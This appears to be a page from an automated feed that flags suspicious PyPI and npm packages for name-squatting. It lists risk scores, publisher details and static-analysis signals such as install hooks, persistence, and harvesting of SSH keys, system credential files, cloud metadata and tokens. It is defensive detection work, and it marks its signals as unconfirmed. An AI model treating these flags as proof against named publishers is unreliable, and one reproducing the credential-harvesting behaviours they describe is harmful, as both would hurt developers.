Automated package-squatting & slopsquatting detection signals across PyPI and npm — these are automated, unconfirmed signals. Use them to find candidates to investigate, but don't automatically assume they're malicious.

Sorted by risk score. Cleared packages hidden by default — add verdict:benign_community to include. Packages the registry has since removed are hidden too — see them on the Taken Down tab or add state:taken_down. Very risky packages require manual human audit. • Tag & Signal Legend →

Search & filter syntax reference
Filter with verdict: (malicious, suspicious, unverified_high_signal, squatted_stub…), ecosystem: (pypi/npm), hook: (install, network, pth, gyp, worm, c2, creds, binary, env, stealer, any — malicious hooks & behaviors), email:, domain:, keyword:, version: (comma = OR within a field, space = AND across fields), age:<6h / age:>90d (combine both for a range), state:live / state:taken_down (registry liveness — the feed defaults to state:live), lead:>7d (days we had a since-removed package flagged while it was still up), or a bare word for a package-name search.
Package Score Age Users Lines Growth Verdict Targeted Ecosystem Version Author Email domain Signals
370 43h 0 1,509 ↑0.0/day
Very Risky
vpspilot pypi 1.0.0 Technology Innovision Team 🪝
Claimed homepage: https://pypi.org/project/vpspilot/
Matched naming pattern: python-vpspilot-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 2
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 1509 lines, 61.6 kB across 12 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALINSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:38
  • CRITICALINSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:39
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/setup.py:38
  • HIGHINSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in vpspilot-1.0.0/setup.py:8
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in vpspilot-1.0.0/setup.py:35
  • HIGHSUPPLY_CHAIN_EXECUTION_HOOK: 'PyPI Custom Install Class Override' found in vpspilot-1.0.0/setup.py:8
Static code signals:
  • INSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:38
  • INSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:39
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/setup.py:38
  • INSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in vpspilot-1.0.0/setup.py:8
  • SYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in vpspilot-1.0.0/setup.py:35
  • SUPPLY_CHAIN_EXECUTION_HOOK: 'PyPI Custom Install Class Override' found in vpspilot-1.0.0/setup.py:8
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in vpspilot-1.0.0/setup.py
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/vpspilot/cli.py:84

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
340 145d 20 19,232 ↑0.1/day
🚨 Possible Stealer Very Risky
talisman pypi 1.1.0 MR MARCUS TAYK 🪝
Claimed homepage: https://pypi.org/project/talisman-recon/
Matched naming pattern: python-talisman-recon
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 145
Registry downloads: 20/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 19232 lines, 865.0 kB across 129 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHPackage registered recently (138 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/ai/engine.py:43
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/cli.py:137
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/engine/plugin_manager.py:210
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/modules/activedirectory/kerberos.py:20
  • HIGHANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:35
  • HIGHSUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:19
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in talisman_recon-1.1.0/talisman/modules/api/oauth.py:31
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/ai/engine.py:43
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/cli.py:137
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/engine/plugin_manager.py:210
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/modules/activedirectory/kerberos.py:20
  • ANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:35
  • SUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:19
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in talisman_recon-1.1.0/talisman/modules/api/oauth.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in talisman_recon-1.1.0/talisman/modules/cloud/aws.py:39

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
315 96d 11 3,903 ↑0.1/day
Very Risky
azure pypi 1.0.0 Cisco Systems Inc. c8kv-cloud-dev@cisco.com cisco.com 🪝
Claimed homepage: https://github4-chn.cisco.com/csr1000v-azure/c8kv_azure_utils
Matched naming pattern: django-azure-auth
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 96
Registry downloads: 11/month, 1/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 3903 lines, 193.4 kB across 24 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'c8kv-azure-utils' matches AI hallucination template [django] + [azure] + [auth].
  • HIGHClaims critical enterprise brand identity ('AZURE').
  • HIGHPublisher email 'c8kv-cloud-dev@cisco.com' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (89 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/as_azure.py:39
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/auth_mgr.py:69
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/eventhub_utils.py:26
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/as_azure.py:39
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/auth_mgr.py:69
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/eventhub_utils.py:26
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/ha_azure.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/meta_utils.py:12
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/metric_utils.py:31
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in c8kv_azure_utils-1.0.0/c8kv_cloud/metric_utils.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/msi_auth.py:44

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
265 94d 468 1,254 ↑5.0/day
Very Risky
claude npm 1.2.3 🪝
Matched naming pattern: claude-claude-tracker
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 94
Registry downloads: 468/month, 117/week (MODERATE_USAGE)
Codebase size: 1254 lines, 49.9 kB across 8 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (87 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node ./bin/postinstall.js'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/claude-tracker.js:18 (+6 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/claude-tracker.js:109 (+6 more occurrence(s) elsewhere)
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/bin/claude-tracker.js:121 (+1 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node ./bin/postinstall.js'
  • MISSING_SOURCE_REPOSITORY_URL
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/claude-tracker.js:18 (+6 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/claude-tracker.js:109 (+6 more occurrence(s) elsewhere)
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/bin/claude-tracker.js:121 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/bin/claude-tracker.js (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/lib/poller.js:20 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/poller.js:64 (+3 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
260 96d 27 102,049 ↑0.3/day
Very Risky
tether pypi 0.12.0 FastCrest 🪝
Claimed homepage: https://pypi.org/project/fastcrest-tether/
Matched naming pattern: python-tether-fastcrest
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 96
Registry downloads: 27/month, 2/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 102049 lines, 4.9 MB across 498 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'fastcrest-tether' matches AI hallucination template [python] + [tether] + [fastcrest].
  • HIGHClaims critical enterprise brand identity ('TETHER').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (89 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:142
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:119
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:51
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:142
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:119
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:51
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/export_pi0_monolithic.py:155
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/local_expert_diff.py:15
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/local_full_diff.py:36

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
260 133d 18 4,285 ↑0.1/day
Very Risky
claude pypi 0.2.0 claude-oneclick contributors 🪝
Claimed homepage: https://pypi.org/project/claude-oneclick/
Matched naming pattern: python-claude-oneclick
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 133
Registry downloads: 18/month, 6/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4285 lines, 194.9 kB across 20 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-oneclick' matches AI hallucination template [python] + [claude] + [oneclick].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (126 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:117
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/cli.py:332
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:57
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:117
  • SYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/cli.py:332
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:57
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:78
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/diagnose.py:144
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/diagnose.py:220
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/launcher.py:66

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
255 88d 18 311 ↑0.2/day
🚨 Possible Stealer Very Risky
vllm pypi 1.0.2 aravindhvignesh58@gmail.com gmail.com 🪝 📡
Claimed homepage: https://pypi.org/project/open-vllm/
Matched naming pattern: python-vllm-open
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 88
Registry downloads: 18/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 311 lines, 17.1 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'open-vllm' matches AI hallucination template [python] + [vllm] + [open].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'aravindhvignesh58@gmail.com' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (81 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:64
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:52
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:53
  • CRITICALSOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:64
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:52
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:53
  • SOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
255 189d 159 14,528 ↑0.8/day
Very Risky
claude npm 1.0.9 🪝
Claimed homepage: https://github.com/yyzybb537/remote_claude#readme
Matched naming pattern: node-claude-remote
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 189
Registry downloads: 159/month, 39/week (MODERATE_USAGE)
Codebase size: 14528 lines, 581.1 kB across 49 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'remote-claude' matches AI hallucination template [node] + [claude] + [remote].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • MEDIUMPackage registered 182 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'bash scripts/preinstall.sh'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/postinstall.sh'
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'bash scripts/preinstall.sh'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/postinstall.sh'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
255 203d 248 37,296 ↑1.2/day
Very Risky
phantom pypi 0.9.218 Usta0x001 r_gadouri@estin.dz estin.dz 🪝
Claimed homepage: https://pypi.org/project/phantom-agent/
Matched naming pattern: python-phantom-agent
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 203
Registry downloads: 248/month, 10/week (MODERATE_USAGE)
Codebase size: 37296 lines, 1.7 MB across 151 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'phantom-agent' matches AI hallucination template [python] + [phantom] + [agent].
  • HIGHClaims critical enterprise brand identity ('PHANTOM').
  • HIGHPublisher email 'r_gadouri@estin.dz' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 196 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/agents/base_agent.py:778
  • HIGHCREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:95
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:51
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/config/config.py:308
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/agents/base_agent.py:778
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:95
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:51
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/config/config.py:308
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/config/secrets.py:91
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/interface/cli_app.py:1547
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/interface/cli_app.py:23
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/interface/utils.py:813

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
235 80d 113 4,381 ↑1.4/day
Very Risky
claude pypi 0.2.1 paris-paraskevas 🪝 🗄️
Claimed homepage: https://pypi.org/project/claude-usage-tracker/
Matched naming pattern: claude-claude-tracker
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 80
Registry downloads: 113/month, 9/week (MODERATE_USAGE)
Codebase size: 4381 lines, 243.7 kB across 1 file (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (73 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1614
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1633
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1670
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:2816
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:59
Static code signals:
  • CREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1614
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1633
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1670
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:2816
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:59
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1638
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:4159
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in claude_usage_tracker-0.2.1/claude_usage_tracker.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
230 118d 540 17,648 ↑4.6/day
Very Risky
claude pypi 0.3.45 be2jay67@gmail.com gmail.com 🪝 🗄️
Claimed homepage: https://pypi.org/project/claude-ns-hub/
Matched naming pattern: claude-claude-hub
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 118
Registry downloads: 540/month, 8/week (MODERATE_USAGE)
Codebase size: 17648 lines, 1.3 MB across 10 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'be2jay67@gmail.com' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (111 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/hub-encode-daemon.py:96
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_ns_hub-0.3.45/server.py:7570
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_ns_hub-0.3.45/server.py:187
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_ns_hub-0.3.45/server.py:4202
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/server.py:77
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/hub-encode-daemon.py:96
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_ns_hub-0.3.45/server.py:7570
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_ns_hub-0.3.45/server.py:187
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_ns_hub-0.3.45/server.py:4202
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/server.py:77
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in claude_ns_hub-0.3.45/server.py:5479
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in claude_ns_hub-0.3.45/server.py:18838
  • ANTI_ANALYSIS_EVASION: 'Extended Scanner Timeout Stall' found in claude_ns_hub-0.3.45/server.py:3594

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
230 415d 4,986 128,928 ↑12.0/day
Very Risky
claude pypi 6.5.83 Claude MPM Team bob@matsuoka.com matsuoka.com 🪝
Claimed homepage: https://pypi.org/project/claude-mpm/
Matched naming pattern: python-claude-mpm
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 415
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 4986/month, 2383/week (ACTIVE_COMMUNITY_USE)
Codebase size: 128928 lines, 6.3 MB across 1043 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-mpm' matches AI hallucination template [python] + [claude] + [mpm].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'bob@matsuoka.com' is not affiliated with official vendor domain.
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/adapters/cli_adapters.py:33
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/agents/agent_loader.py:752
